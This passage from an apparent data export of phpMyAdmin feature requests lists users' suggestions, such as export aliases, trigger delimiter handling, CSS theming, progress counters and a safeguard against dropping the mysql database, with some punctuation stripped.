Original URL https sourceforge.net p phpmyadmin feature requests 749 https sourceforge.net p phpmyadmin feature requests 749 Original author cyranoid","enhancement"
"24444","5449","old password ) in functions dropdown.
Could you add old password ) to the functions dropdown in the row editor?
Original URL https sourceforge.net p phpmyadmin feature requests 750 https sourceforge.net p phpmyadmin feature requests 750 Original author olafvdspek","enhancement"
"24444","5450","Catch headers already sent .
My php.ini had post max size = 8M upload max filesize = 2M I tried to upload a SQL file gt; 8MB, and at first I got Warning POST Content Length of 8458611 bytes exceeds the limit of 8388608 bytes in Unknown on line 0 Warning Cannot modify header information headers already sent in main.php on line 15 Warning Cannot modify header information headers already sent in main.php on line 17 Warning Cannot modify header information headers already sent in libraries\header http.inc.php on line 14 Warning Cannot modify header information headers already sent in libraries\header http.inc.php on line 15 Warning Cannot modify header information headers already sent in libraries\header http.inc.php on line 16 Warning Cannot modify header information headers already sent in libraries\header http.inc.php on line 17 Warning Cannot modify header information headers already sent in libraries\header http.inc.php on line 20 After changing post max size to 16MB, it fell through and complained Warning upload max filesize of 2097152 bytes exceeded file [sql file= lt;filename gt;.sql] not saved in Unknown on line 0 Warning Cannot modify header information headers already sent in libraries\header http.inc.php on line 14 Warning Cannot modify header information headers already sent in libraries\header http.inc.php on line 15 Warning Cannot modify header information headers already sent in libraries\header http.inc.php on line 16 Warning Cannot modify header information headers already sent in libraries\header http.inc.php on line 17 Warning Cannot modify header information headers already sent in libraries\header http.inc.php on line 20 Changing the two php.ini values to 16MB allowed the SQL insertion to proceed as expected, but these two settings should obviously be trapped in phpMyAdmin rather than letting PHP spew warnings ) Original URL https sourceforge.net p phpmyadmin feature requests 751 https sourceforge.net p phpmyadmin feature requests 751 Original author getid3","enhancement"
"24444","5451","Spatial Extensions in MySQL.
I would add the spatial extensions in phpMySQL.
How do I have to start with the integration of the spatial part in phpMySQL program.
When I read chapter 18 of the MYSQL guide, I find it to hard to remember the hardcore code and retype every code.
phpMySQL Is for me the best program to integrade this unknown part of MySQL that is getting more and more interesting in the construction of databases.
Original URL https sourceforge.net p phpmyadmin feature requests 752 https sourceforge.net p phpmyadmin feature requests 752 Original author gvanaco","enhancement"
"24444","5452","With selected change table type.
In database view, add a dropdown with all the possible table types, and change to the chosen type for all selected tables.
Original URL https sourceforge.net p phpmyadmin feature requests 753 https sourceforge.net p phpmyadmin feature requests 753 Original author lem9","enhancement"
"24444","5453","Edit only selected fields near edit icon).
I use tables with more fields, I view some fields in search, after this I d like to edit only some fields the fields seen and not all fields.
Original URL https sourceforge.net p phpmyadmin feature requests 754 https sourceforge.net p phpmyadmin feature requests 754 Original author lotabi","enhancement"
"24444","5454","Ok 4.3) export with table column name changes.
I love the current export functionality works perfect every time for me at least).. what would be really helpful in the end would be an export feature that would allow you to transform translate the field names table names in the exported information... For example I m migrating data from one database into another, but the field names are different and the table names are different.
So I could check an option like translate data output and then a DHTML frame would display showing the current field table names with a handy gt; and then a text box.. e.g.
[] Translate Column or Table Names [] Old Table 1 Name gt; [ ] Old Column 1 Name gt; [ ] Old Column 2 Name gt; [ ] [] Old Table 2 Name gt; [ ] Old Column 1 Name gt; [ ] Old Column 2 Name gt; [ ] where the checkbox in front of a table name could be used to indicate if that is included in the transformation could be optional vs. having to check for input all the way).
This would greatly enhance the handiness of phpmyadmin and just be plain ole cool.
Thanks!
Original URL https sourceforge.net p phpmyadmin feature requests 755 https sourceforge.net p phpmyadmin feature requests 755 Original author pauluskc","enhancement"
"24444","5455","Handle duplicate fields in indexes.
I try to copy from one databases to another and it create the following sql query... look at the primary key.
CREATE TABLE `duplex`.`users` `uid` int 11 ) unsigned NOT NULL AUTO INCREMENT , `username` varchar 64 ) NOT NULL default , `password` varchar 64 ) NOT NULL default , `lastName` varchar 64 ) NOT NULL default , `firstName` varchar 64 ) NOT NULL default , `language` varchar 4 ) NOT NULL default , `title` varchar 4 ) NOT NULL default , `email` varchar 128 ) NOT NULL default , `address` varchar 255 ) NOT NULL default , `city` varchar 128 ) NOT NULL default , `postalCode` varchar 10 ) NOT NULL default , `region` varchar 128 ) NOT NULL default , `country` varchar 5 ) NOT NULL default , `plan` varchar 10 ) NOT NULL default , `securityDate` date NOT NULL default 0000 00 00 , `registerId` varchar 128 ) NOT NULL default , `registerDate` date NOT NULL default 0000 00 00 , `expireDate` date NOT NULL default 0000 00 00 , `emailConfirmed` enum 0 , 1 ) NOT NULL default 0 , `active` enum 0 , 1 ) NOT NULL default 0 , `currentLogin` datetime NOT NULL default 0000 00 00 00 00 00 , `lastLogin` datetime NOT NULL default 0000 00 00 00 00 00 , `lastModifDate` datetime NOT NULL default 0000 00 00 00 00 00 , `lastModifAction` varchar 64 ) NOT NULL default , `reclamation` enum pending , none ) NOT NULL default none , PRIMARY KEY `uid` , `uid` ) , UNIQUE KEY `Username` `username` ) ) ENGINE = MYISAM DEFAULT CHARSET = latin1 It must be PRIMARY KEY `uid` `uid` ) , Original URL https sourceforge.net p phpmyadmin feature requests 756 https sourceforge.net p phpmyadmin feature requests 756 Original author diablx","enhancement"
"24444","5456","textarea for editing queries.
I think the usability would improve if all the textarea s where you can type queries had a fixed size font, like Courier New, because you those fonts make writing code easier.
Original URL https sourceforge.net p phpmyadmin feature requests 758 https sourceforge.net p phpmyadmin feature requests 758 Original author toraq","enhancement"
"24444","5457","Ok 4.3) use aliases in SQL export for tables and columns.
When exporting to a SQL query phpMyAdmin will break functions into multiple columns.
It will then remove the same ammount of columns passed to the funciton from the end of the column list.
ex SELECT CONCAT DOMAIN\\ , `username` ) AS uname , fullname ; will export a query INSERT INTO table `DOMAIN\\`, `username`) VALUES DOMAIN\\john , John Doe ); instead of ...table `uname`,`fullname`) values...
Similarly, phpMyAdmin doesnt recognise renamed columns in the export select `name` as fullname where 1; will export insert into table name ) values John Doe ); Original URL https sourceforge.net p phpmyadmin feature requests 759 https sourceforge.net p phpmyadmin feature requests 759 Original author mobilla","enhancement"
"24444","5458","dropdown for special SQL like SUM,AVG and GROUP BY.
there could be a dropdown box, next to the sql querz textarea, whith important sql commands and their descriptions, like SUM, AVG, CONCAT, date conversions like FROM UNIXTIME and many more also the GROUP BY functionality should be acessible in pma Original URL https sourceforge.net p phpmyadmin feature requests 757 https sourceforge.net p phpmyadmin feature requests 757 Original author rubo77","enhancement"
"24444","5459","Automated login.
I m trying to make a script which will automatically log a user into phpmyadmin from a controlpanel.
I can get the un pw through the script but I can t figure out hwo to use the information to automatically login to pma.
I ve tried cookies, but it still fails.
Any help would, examples, documentation would be great.
Original URL https sourceforge.net p phpmyadmin feature requests 760 https sourceforge.net p phpmyadmin feature requests 760 Original author jmstacey","enhancement"
"24444","5460","Like .
In the search function, even if the sql is Like I would change the wording to Contains Mysql Like ) or simply Contains and Like to Equals Mysql Like) or simply Equals Original URL https sourceforge.net p phpmyadmin feature requests 761 https sourceforge.net p phpmyadmin feature requests 761 Original author jtjohnston","enhancement"
"24444","5461","Search Edit next row.
I ran a search SELECT FROM `DistrictCalendar` WHERE `message` LIKE d.d.g.m.
LIMIT 0 , 30 But when I began editing the selected rows, and chose Edit next row , it did not keep in mind the SELECT above.
It selected the next one by my primary key.
phpMyAdmin 2.6.2 MySQL 3.23.58 running Original URL https sourceforge.net p phpmyadmin feature requests 762 https sourceforge.net p phpmyadmin feature requests 762 Original author jtjohnston","enhancement"
"24444","5462","Warning before silent data conversion truncation.
1.In phpMyAdmin open the database 2.Try to insert a character set for integer type of values for a primary key having auto increment property 3.See that it is accepting it 4.Try to retreive the record set 5.See that in place of characters it has just autoincremented the values Original URL https sourceforge.net p phpmyadmin feature requests 763 https sourceforge.net p phpmyadmin feature requests 763 Original author lakshmiprasanna","enhancement"
"24444","5463","Remove leading trailing spaces when creating db.
1.In phpMyAdmin project create a database 2.Again go to home page 3.Give the same database name but witha blank space in starting 4.click on create button 5.see that a new database is created Test Environment MySql 3.23.32 or higher Operating System windows xp Internet explorer 6.0 Original URL https sourceforge.net p phpmyadmin feature requests 764 https sourceforge.net p phpmyadmin feature requests 764 Original author lakshmiprasanna","enhancement"
"24444","5464","Do not allow to create table that already exists.
1.open phpMyAdmin home page 2.open a database 3.try to create a table with a namealready existing 4.We will see that the next page comes asking to enter the fields Test Environment MySql 3.23.32 or higher Operating System windows xp Internet explorer 6.0 Original URL https sourceforge.net p phpmyadmin feature requests 765 https sourceforge.net p phpmyadmin feature requests 765 Original author lakshmiprasanna","enhancement"
"24444","5465","Save and upload directories per user.
Good day, Is it possible to add support to the save and upload directory configuration items so that they can include the username as a directory.
That way on a server with many diferent people accessing diferent databases, no one can import somone elses backup, and if they want to backup their data, it goes to a directory that they can only access and not everyone else?
Thanks Terry Original URL https sourceforge.net p phpmyadmin feature requests 766 https sourceforge.net p phpmyadmin feature requests 766 Original author finian 826","enhancement"
"24444","5466","USING BTREE support for HEAP MEMORY tables.
In mySQL 4.1, the HEAP MEMORY table type can use BTREE instead of HASH for indexes.
However, I can find no way to make this choice within phpMyAdmin.
In fact, I suspect that if I modify my indexes through phpMyAdmin, they will revert to HASH this could even qualify as a bug, then).
Original URL https sourceforge.net p phpmyadmin feature requests 767 https sourceforge.net p phpmyadmin feature requests 767 Original author habbie","enhancement"
"24444","5467","Ignore the first ... lines of a text csv file.
hello please add the option Ignore the first ... 0 9) lines of a text csv file at Insert data from a text file into the table http localhost phpmyadmin ldi table.php) thx Original URL https sourceforge.net p phpmyadmin feature requests 772 https sourceforge.net p phpmyadmin feature requests 772 Original author misterx1980","enhancement"
"24444","5468","Browse checked columns only.
Hi!
In the table view there is a list of fields in the table with checkboxes next to it.
It is possible to Edit, Drop or create indexes on these columns.
Another 6 th) icon that would create a SELECT statement with selected columns on the selected table would be very helpful.
Specially usefull for tables with many columns rows.
The SELECT statement could be immediately executed.
Greetings, MickeyMiner Original URL https sourceforge.net p phpmyadmin feature requests 773 https sourceforge.net p phpmyadmin feature requests 773 Original author mickeyminer","enhancement"
"24444","5469","Configurable default export charset.
Hello, it would be a big help to have a possibility to define the default setting of the character code selection for the export destiniation file charset of file ) when you have activated cfg[ AllowAnywhereRecoding ], thus to avoid that you need to always select the requested code on every export.
Greetings, Hans Peter Original URL https sourceforge.net p phpmyadmin feature requests 768 https sourceforge.net p phpmyadmin feature requests 768 Original author hps kxbmw","enhancement"
"24444","5470","MySQL5 Trigger support just SQL first).
It would be nice if the SQL parser would recognize CREATE TRIGGER sql statements and just change DELIMITER for this single statement to something not used in the statement, i.e.
.
Example query CREATE TRIGGER trigger documents forum delete AFTER DELETE ON documents FOR EACH ROW BEGIN IF OLD.document category id=2 THEN UPDATE forum postings SET last update=NOW ) WHERE node id=OLD.foreign id; END IF; END; phpMyAdmin should execute automatically before a CREATE TRIGGER statement DELIMITER and after the CREATE TRIGGER statement DELIMITER ; Conclusion Each single CREATE TRIGGER statement should be surrounded automatically by two DELIMITER statements.
The working example from the MySQL 5.0.11 command line is DELIMITER CREATE TRIGGER trigger documents forum delete AFTER DELETE ON documents FOR EACH ROW BEGIN IF OLD.document category id=2 THEN UPDATE forum postings SET last update=NOW ) WHERE node id=OLD.foreign id; END IF; END; DELIMITER ; GUI support for triggers could be added later of course ;) Best regards, Renxc3xa9 Leonhardt Original URL https sourceforge.net p phpmyadmin feature requests 769 https sourceforge.net p phpmyadmin feature requests 769 Original author rele","enhancement"
"24444","5471","Multiple Table Copies.
Just thinking it would probably be a good idea to allow multiple table copies at once, so when backing up 20 or so tables by copying them to 20 new tables, it would be easier to copy them all at once rather then having to do it one by one.
Original URL https sourceforge.net p phpmyadmin feature requests 770 https sourceforge.net p phpmyadmin feature requests 770 Original author switchblade99","enhancement"
"24444","5472","Question about import and ini set ).
Is there any reason we can t use PHP s ini set function to change the resource limits when we re importing files?
It may be a dumb question but seems to be an easy solution, although I m not sure how things like safe mode affect the function of ini set ).
Just a thought I ve been cooking up, I d like to know if I m an idiot though ;) Original URL https sourceforge.net p phpmyadmin feature requests 771 https sourceforge.net p phpmyadmin feature requests 771 Original author ibennetch","enhancement"
"24444","5473","Emit W3C standard compliant XHTML pages.
I m using phpMyAdmin 2.6.3 pl1 and it produces XHTML 1.0 Transitional pages which don t comply with the W3C definition.
Please upgrade it to do so.
This will be a benefit for cross browser predictability and compatibility.
Also it should improve maintainability it s easier to test when the output is correctly as expected.
TIA, Rick ) Original URL https sourceforge.net p phpmyadmin feature requests 777 https sourceforge.net p phpmyadmin feature requests 777 Original author rickbeton","enhancement"
"24444","5474","Search empty not empty values.
Is not simply to create a query within WHERE= in Search autocompose form.
I must use Add search conditions ?
Is possible add feature to search null values?
Original URL https sourceforge.net p phpmyadmin feature requests 774 https sourceforge.net p phpmyadmin feature requests 774 Original author lotabi","enhancement"
"24444","5475","lists for the navigation in the right frame.
Don t know if the issue fits into this category.
I m wondering why the navigation classes tab, tabactive, tabcaution) are used plain and why this navigation is not wrapped using an unordered list and css display inline; .
From the aspect of WAI it would be a better solution.
I know that it wouldn t look that nice without css support, but people with dissabilities can navigate through a list using the keybord.
So it would enhance the usibility looking at this point.
Original URL https sourceforge.net p phpmyadmin feature requests 778 https sourceforge.net p phpmyadmin feature requests 778 Original author andyscherzinger","enhancement"
"24444","5476","Pretty URLS support.
It would be nice to surf to your database.
I would like to see that i could enter a url like http server phpmyadmin lt;database gt; phpMyAdmin would then open the specified lt;database gt;.
Original URL https sourceforge.net p phpmyadmin feature requests 775 https sourceforge.net p phpmyadmin feature requests 775 Original author rikmeijer","enhancement"
"24444","5477","Behaviour of Browse Button.
Sometimes I Empty a Table using phpMyadmin and in the next moment I let some other program insert some date into this table.
To view the new entered row I have to click on the tiny tiny Browse icon before the table name in the tablelist on the leftlost side of the screen) because my favourite and huge Browse button on the top of the page is disabled caused by my click on the Empty button).
I think it would be better, when the big Browse button would behave exactly like the one in the table list or maybe show a notice that the table is still empty.
Thanks for this great piece of software and excuse my English.
Sascha Original URL https sourceforge.net p phpmyadmin feature requests 780 https sourceforge.net p phpmyadmin feature requests 780 Original author tco2000","enhancement"
"24444","5478","Favorite SQL statements list.
A really useful feature would be a list where one can simply save SQL statements one often uses in a database like for truncatin multiple tables, delete specific records from tables, a special select with multiple joins,....).
This should be easily possible using cookies.
Thanks in advance! )
Toby P.S.
Greetings to the Linuxtag mates!
;) Original URL https sourceforge.net p phpmyadmin feature requests 776 https sourceforge.net p phpmyadmin feature requests 776 Original author dotxp","enhancement"
"24444","5479","OPTIMAL MY.INI VALUES.
Hello Developers !
The mysql server runtime status sheet should include a function to determine the best my.ini values which can be calculated est.).
eg.
runtime information Key read requests 278696 Key reads 5121 Key write requests 32878 Key writes 18085 So if someone knows about finetuning mysql, the recommended values are divide the value of key read by the value of key reads requests this should be less than 0.01. same for writes.
So phpmyadmin should show these and other values maybe in other color red) to give some hints for better my.ini settings.
Original URL https sourceforge.net p phpmyadmin feature requests 779 https sourceforge.net p phpmyadmin feature requests 779 Original author petesky","enhancement"
"24444","5480","Privileges for non superuser.
This was touched on by another support question, but mine is slightly different.
I have a database provided by UK FastHosts.
The owner whome I log in as) has privileges to add other users and assign them privileges.
I know this becuase I can do a GRANT select, update .... statement in phpmyadmin s query window) and it adds users and correctly assigns then the privileges.
The problem that I have is that in Phpmyadmin, there is no easy way to modify the privileges that have been assigned etc.
The entire privileges link is not shown even though the owner is able to modify database privileges.
I quess this is becuse the privileges tab is only shown if the logged in user has global privileges and database privileges are not taken into account.
Is it feasible to add this as a RFC?
Original URL https sourceforge.net p phpmyadmin feature requests 781 https sourceforge.net p phpmyadmin feature requests 781 Original author compatcart","enhancement"
"24444","5481","Ability to disable display of fields in query box.
How about making a global config variable which can disable the display of the fields selection in the query window?
I d like to be able to make the query window pretty large in the JS popup window and the fields listing is creating a horizontal scrollbar.
Original URL https sourceforge.net p phpmyadmin feature requests 782 https sourceforge.net p phpmyadmin feature requests 782 Original author luegner","enhancement"
"24444","5482","Add a class to all icons.
as i have shown in http sourceforge.net tracker index.php?func=detail aid=1298729 group id=23067 atid=689412 it is needed that all checkboxes in pma have their own class defined, cause then you can access them in your theme CSS also all image icons should have NO height= 16 parameter in it, so you can control the height in your theme yourself in that way, that you resize the icons to the height you want to have in particular smaller ; ) ) i added a screenshot how it could look like with the modifications Original URL https sourceforge.net p phpmyadmin feature requests 783 https sourceforge.net p phpmyadmin feature requests 783 Original author rubo77","enhancement"
"24444","5483","Sort files in select box.
Files should be sorted in select box.
preferabely using same function for upload save directory.
Original URL https sourceforge.net p phpmyadmin feature requests 784 https sourceforge.net p phpmyadmin feature requests 784 Original author nijel","enhancement"
"24444","5484","Support for user information.
MySQL at least 5.x) has support for storing additional user information in mysql.user info table.
It should be possible to read and modify these values from privileges page.
Information that can be stored in that table Full name Description Email Contact information Icon BLOB) Original URL https sourceforge.net p phpmyadmin feature requests 785 https sourceforge.net p phpmyadmin feature requests 785 Original author nijel","enhancement"
"24444","5485","autodetect mysql extension to use.
set default cfg[ Servers ][ i][ extension ] to and try to autodetect available mysql extension use cfg[ Servers ][ i][ extension ] to force extension to use.
Original URL https sourceforge.net p phpmyadmin feature requests 790 https sourceforge.net p phpmyadmin feature requests 790 Original author cybot tm","enhancement"
"24444","5486","More table actions in database view.
Dear phpMyAdmin team, 1) I would love to have more actions for multiple selected tables in the database view Export Change Type Change Collation 2) Additional Javascript Selects on the column titels would be useful, too.
JavaScript link on Type selects all tables of one type MyISAM, InnoDB, ...), next click on the link deselects and select all tables of the next type found The same for Collations 3) Alternatively additionally sorting of columns Table, Items, Type, Collation, Size Keep up the good work, Renxc3xa9 Original URL https sourceforge.net p phpmyadmin feature requests 786 https sourceforge.net p phpmyadmin feature requests 786 Original author rele","enhancement"
"24444","5487","Show MySQL system variables.
The option Show MySQL system variables is only shown on the main page if the user who s logged in has administrative privileges.
However, the command show variables is also accessible to non privileged users, so I think it would be nice to make this option visible to those users, too.
Original URL https sourceforge.net p phpmyadmin feature requests 787 https sourceforge.net p phpmyadmin feature requests 787 Original author mpopp75","enhancement"
"24444","5488","QueryFrameJS configures too much of the Query Frame behavior.
Hi!
phpMyAdmin is highly configurable, which is one more reason many people like it so much.
This post is about the QueryFrameJS option.
If it is TRUE, it does two from user s point of view) things first, it makes phpMyAdmin to open new window when I select the link xc2x93[Edit]xc2x94 bellow the just executed SQL query.
This is behavior I dislike.
second, it makes the xc2x93SQLxc2x94 link from the left frame to open a new window where I can find the xc2x93Historyxc2x94 tab.
This is feature I like.
So, if I want to make phpMyAdmin to edit current query in the same frame in which it displayed the result, and also keep the xc2x93Historyxc2x94 page in the QueryWindow, I cannot achieve it with current configuration settings.
My suggestion, if technically achievable, is to separate the configuration settings.
So one can keep the xc2x93Historyxc2x94 tab in SQL Query window and also activate the xc2x93on placexc2x94 query editing in the right frame).
P.S.
QueryFrame configuration setting enables right frame query editing, but disables the SQL link in the left frame P.S.S I searched the Features for similar one to avoid duplicates, couldn t find any.
Original URL https sourceforge.net p phpmyadmin feature requests 788 https sourceforge.net p phpmyadmin feature requests 788 Original author gtalev","enhancement"
"24444","5489","Icky tabs.
I just upgraded from 2.6.3 to 2.6.4 ... and I find the new rounded tabs to be absolutely ugly.
The black bar under them makes no sense, and the bottom edges of the tabs do not match with the bar.
Please switch back to the tabs as they were in 2.6.3.
Also, the order of the tabs has changed in some places and that s surely not welcome.
Original URL https sourceforge.net p phpmyadmin feature requests 789 https sourceforge.net p phpmyadmin feature requests 789 Original author arantius","enhancement"
"24444","5490","PhP Form generation.
I would love to see the ability to generate a form based on the fields in a table that could be output to a .php.
This way I could generate a .php in an admin only area giving me the ability to rapidly input data into the table through an easy .php interface designed for that table.
Original URL https sourceforge.net p phpmyadmin feature requests 791 https sourceforge.net p phpmyadmin feature requests 791 Original author zushiba","enhancement"
"24444","5491","OpenDocument Export.
Dear phpMyAdmin team, we all know that the OpenDocument format is going to change many things, and as MS repeated at last LinuxWorld to not support MS Office on Linux, I think there should be an OpenDocument export in phpMyAdmin, too.
Because there already is a XML export in phpMyAdmin and exporting an example MySQL table with OpenOffice Base as CSV document is a matter of seconds, it should be not too hard.
Keep up the good work, Renxc3xa9 Original URL https sourceforge.net p phpmyadmin feature requests 792 https sourceforge.net p phpmyadmin feature requests 792 Original author rele","enhancement"
"24444","5492","MySQL replication control over phpMyAdmin.
this feature should consider of 1) control over replication slave a) show slave specific information b) control replication settings start stop replication, change master, load data from master, etc..) 2) control over replication master a) show master specific information b) control binlogs flush master logs, purge master logs etc...) Original URL https sourceforge.net p phpmyadmin feature requests 793 https sourceforge.net p phpmyadmin feature requests 793 Original author tyntas","enhancement"
"24444","5493","Disable comments in export.
Can we have an option to stop comments being added during export?
Original URL https sourceforge.net p phpmyadmin feature requests 794 https sourceforge.net p phpmyadmin feature requests 794 Original author neobuddah","enhancement"
"24444","5494","Export plugins.
Make export plugins more separated to allow just dropping plugin into export directory to make it work.
This should use same approach as import plugins use, sharing as much code as possible.
Original URL https sourceforge.net p phpmyadmin feature requests 796 https sourceforge.net p phpmyadmin feature requests 796 Original author nijel","enhancement"
"24444","5495","Replace most of layout.inc.php in themes by CSS.
There is no need for defining colors in php file, all this can be done using CSS.
Only thing that seems to be needed there are dimensions.
Original URL https sourceforge.net p phpmyadmin feature requests 795 https sourceforge.net p phpmyadmin feature requests 795 Original author nijel","enhancement"
"24444","5496","No keywords in PMA configuration storage s structure.
I just tried to load a mysqldump back into my new mysql server dump was done mysql 3.23.46) nice n10 mysqldump opt AacFfl gt; databases.sql loading backup on new server mysql 3.23.58) mysql lt; databases.sql getting an error on the following line tried that line in PMA too) The Problem seems to be the KEYWORD table because mysqldump didnt use `` for field names I personally think one should never use restricted Keywords in that way even if one might be able to work around that havent checked all mysqldump option yet).
CREATE TABLE PMA history id bigint 20) unsigned NOT NULL auto increment, username varchar 64) NOT NULL default , db varchar 64) NOT NULL default , table varchar 64) NOT NULL default , timevalue timestamp 14) NOT NULL, sqlquery text NOT NULL, PRIMARY KEY id), KEY username username,db,table,timevalue) ) TYPE=MyISAM COMMENT= SQL history MySQL meldet You have an error in your SQL syntax near table varchar 64) NOT NULL default , timevalue timestamp 14) NOT NULL, s at line 5 Original URL https sourceforge.net p phpmyadmin feature requests 797 https sourceforge.net p phpmyadmin feature requests 797 Original author thebelgarion","enhancement"
"24444","5497","comparing of querys.
make use of Last query cost and possible some other things to compare two querys Original URL https sourceforge.net p phpmyadmin feature requests 798 https sourceforge.net p phpmyadmin feature requests 798 Original author cybot tm","enhancement"
"24444","5498","Disable Drop actions for the mysql db.
Would it be possible to alter phpMyAdmin to catch DROP DATABASE mysql and politely tell the requester to reconsider?
If you re anything like me, you re wondering why on Earth anyone would ever drop the mysql database.
I don t have an answer, but around here it happens about once a week.
Our hosting customers are solely responsible for their own MySQL processes and have full admin rights on the process.
So, every week, someone goes through and purges all the database names they don t remember creating, starting with that obviously redundant one called mysql.
MySQL will keep running with its cached user table information until it is restarted, which is often months later.
By then, they have long since forgotten destroying their DB and blame us when it won t restart.
If they even believe us when we tell them that they did it to themselves, they blame us for letting them.
We could modify our in house copy of phpMyAdmin to do complain when people try this, but a fair number just grab their own and install it.
It would be really nice if there was a config option like allow suicidal behavior = false; And follow up code like if sql query == DROP DATABASE mysql !
allow suicidal behavior) \{ ... print Please do not destroy your MySQL database.
); ... \} and possibly if database != mysql || allow suicidal behavior) \{ show drop option ); \} to prevent the like moths to flame attraction of the drop option for the mysql database in the first place.
That way, if there s some legitimate reason for this, the user could change the default behavior to allow it.
It s certainly debatable whether anyone who would remove the mysql database should be allowed administrator access to the server in the first place.
But not giving it to them is a no sale.
It s also doubtful whether phpMyAdmin is the best place to handle this.
But since it s so commonly offered to and used by people with fairly limited MySQL experience, it might save a lot of people a lot of hassle.
Thus, while not the best place, I think it would be a good place to handle it.
Please give it some thought.
Original URL https sourceforge.net p phpmyadmin feature requests 799 https sourceforge.net p phpmyadmin feature requests 799 Original author jeffwheelhouse","enhancement"
"24444","5499","Add transformation for SQL pretty printing.
MIME transformation for SQL pretty printing might be useful.
Original URL https sourceforge.net p phpmyadmin feature requests 800 https sourceforge.net p phpmyadmin feature requests 800 Original author nijel","enhancement"
"24444","5500","Builtin transformations and relations.
There might be set of predefined transformations and relations that work in all cases relations inside mysql database syntax highlighting for SQL in SHOW PROCESSLIST syntax highlighting for SQL in PMA db history There are probably more cases, this is just idea that I don t want to forget ).
Original URL https sourceforge.net p phpmyadmin feature requests 801 https sourceforge.net p phpmyadmin feature requests 801 Original author nijel","enhancement"
"24444","5501","Configurable languages list.
On many installations it might have sense to show just several languages eg.
english and local one), however only way to achieve this right now is to modify libraries select lang.lib.php.
I think this should be doable in configuration.
Original URL https sourceforge.net p phpmyadmin feature requests 802 https sourceforge.net p phpmyadmin feature requests 802 Original author nijel","enhancement"
"24444","5502","Progress Counter for Import Export.
Long imports and exports are a frequent use of phpMyAdmin and with them uncertainty whether they complete or not due to size.
This uncertainty could be reduced by adding a Progress Counter or Bar) that shows how many SQL statements have been executed.
Original URL https sourceforge.net p phpmyadmin feature requests 803 https sourceforge.net p phpmyadmin feature requests 803 Original author topaz505","enhancement"
"24444","5503","Progress Counter for Import Export.
Long imports and exports are a frequent use of phpMyAdmin and with them uncertainty whether they complete or not due to size.
This uncertainty could be reduced by adding a Progress Counter or Bar) that shows how many SQL statements have been executed.
Original URL https sourceforge.net p phpmyadmin feature requests 804 https sourceforge.net p phpmyadmin feature requests 804 Original author topaz505","enhancement"
"24444","5504","MySQL Documentation link to installed version.
When clicking the MySQL Documentation or any contextual help ?)
link, the relevant documentation for the latest version of MySQL is displayed.
At this moment version 5.0.
On the MySQL site documentation for older versions is available.
phpMyAdmin knows what version of MySQL is running on the host it is managing and could show the documentation of that particular version or at least the major revision).
Original URL https sourceforge.net p phpmyadmin feature requests 805 https sourceforge.net p phpmyadmin feature requests 805 Original author marrem","enhancement"
"24444","5505","Reset autoindex button.
It would be useful to have a way to reset an auto increment field, perhaps by placing a Reset button next to the Next autoindex label on the Structure of a database page.
Original URL https sourceforge.net p phpmyadmin feature requests 806 https sourceforge.net p phpmyadmin feature requests 806 Original author cryptkeeper","enhancement"
"24444","5506","reverse chronological display by default.
Hi, PhpMyAdmin rocks.
One thing I d love to see is default browse in reverse chronological order when I click on each table.
I realise that this might not be the ideal default for everyone, but for me it would save a lot of time.
Pretty much 80 of the time that s the first thing I m doing click browse and then go to the last page of results.
Even if this wasn t default for the whole system, it would be great if I could set it so it was default for me.
Many thanks.
CHEERS gt; SAM Original URL https sourceforge.net p phpmyadmin feature requests 807 https sourceforge.net p phpmyadmin feature requests 807 Original author samjoseph","enhancement"
"24444","5507","Suggestions for config.inc.php.
I would have following ideas for the config.inc.php file in 2.7.0 dev, databases which start with the same names are grouped together.
It would be nice if it could be turned off in config.inc.php to get the behavior from the versions lt; 2.6.4 in 2.7.0 dev, the number of rows in the table detail view are given in approximate numbers e.g.
2 k for 2,000).
I would also appreciate if it could be set back to the behavior in previous versions.
the section MySQL settings at the bottom seem to refer to general MySQL issues, less to personal configuration settings.
So it might fit better into a separate file.
a separate changelog only for the config.inc.php would be nice.
If someone updates very frequently like I do) it s much effort to find all the changes between the config.
inc.php in the former version and the new one.
By the way it s a little off topic to config.inc.php) maybe another default theme would also be nice I like the Cactica Blues theme much.
Maybe it s possible to make a poll which theme users would like as a new default ).
Original URL https sourceforge.net p phpmyadmin feature requests 808 https sourceforge.net p phpmyadmin feature requests 808 Original author mpopp75","enhancement"
"24444","5508","Display nbr of columns in table structure page.
Helpful if the table stucture page displays nbr of columns in the table.
When table has many columns and must be synched up with a development table the nbr of columns displayed would help ascertain if a column has been added or dropped from the development table.
Original URL https sourceforge.net p phpmyadmin feature requests 809 https sourceforge.net p phpmyadmin feature requests 809 Original author jganders","enhancement"
"24444","5509","Export Import Data.
hi I just wants to tell there is the option in phpmyadmin to export csv file.
But that is also not working well like if you export csv with html data chose simple csv not CSV for MS Excel option) the Excel file will not be ok.
The lines will be brack whenever you will find br, \n New line character) .
And i also want to ask there is no option to import csv file in phpmyadmin.
Thank you, Viral Shah...
Original URL https sourceforge.net p phpmyadmin feature requests 810 https sourceforge.net p phpmyadmin feature requests 810 Original author viral2583","enhancement"
"24444","5510","Display native name of languages.
It would be nice to provide native name in translation select box, translations can be taken from http wikipedia.org .
Original URL https sourceforge.net p phpmyadmin feature requests 811 https sourceforge.net p phpmyadmin feature requests 811 Original author nijel","enhancement"
"24444","5511","store export definitions for reuse.
I often need partial export import of data.
Let s assume you run an online shop.
So you need to add new products based on your ERP from time to time and from the online system you would want to export for example orders to your ERP system.
I run this based on partial replication of table sets and the actual data tranformation from to the ERP system is based ob some application transferring data from to a local, partial mysql mirror of the online database.
So I would like to store the export definition as some kind of macro or job within phpMyAdmin to avoid selecting the required tables for export again and again.
Original URL https sourceforge.net p phpmyadmin feature requests 812 https sourceforge.net p phpmyadmin feature requests 812 Original author yxlan","enhancement"
"24444","5512","create structure button.
How about a button possibly under operations) which will show the create table statement and the PHP version of it.
Original URL https sourceforge.net p phpmyadmin feature requests 813 https sourceforge.net p phpmyadmin feature requests 813 Original author merrett","enhancement"
"24444","5513","Layout, CSS.
I wish there d be a real content layout separation, using CSS.
I know there s a CSS file, but it doesn t cover everything.
I don t like the layout 100 and would like to make changes, or download the CSS files other people made.
Original URL https sourceforge.net p phpmyadmin feature requests 814 https sourceforge.net p phpmyadmin feature requests 814 Original author philipp","enhancement"
"24444","5514","htmlentities.
i think that the results should be passed through htmlentities instead of htmlspecialchars, because it makes for a valid html output, and it will display characters properly Original URL https sourceforge.net p phpmyadmin feature requests 815 https sourceforge.net p phpmyadmin feature requests 815 Original author ddominey86","enhancement"
"24444","5515","Show processes vs Processes.
On the main screen it s Show processes but other options are just Databases, Privileges, etc.
Wouldn t it be more consistent and clean to drop the show ?
The same applies to Status and Variables.
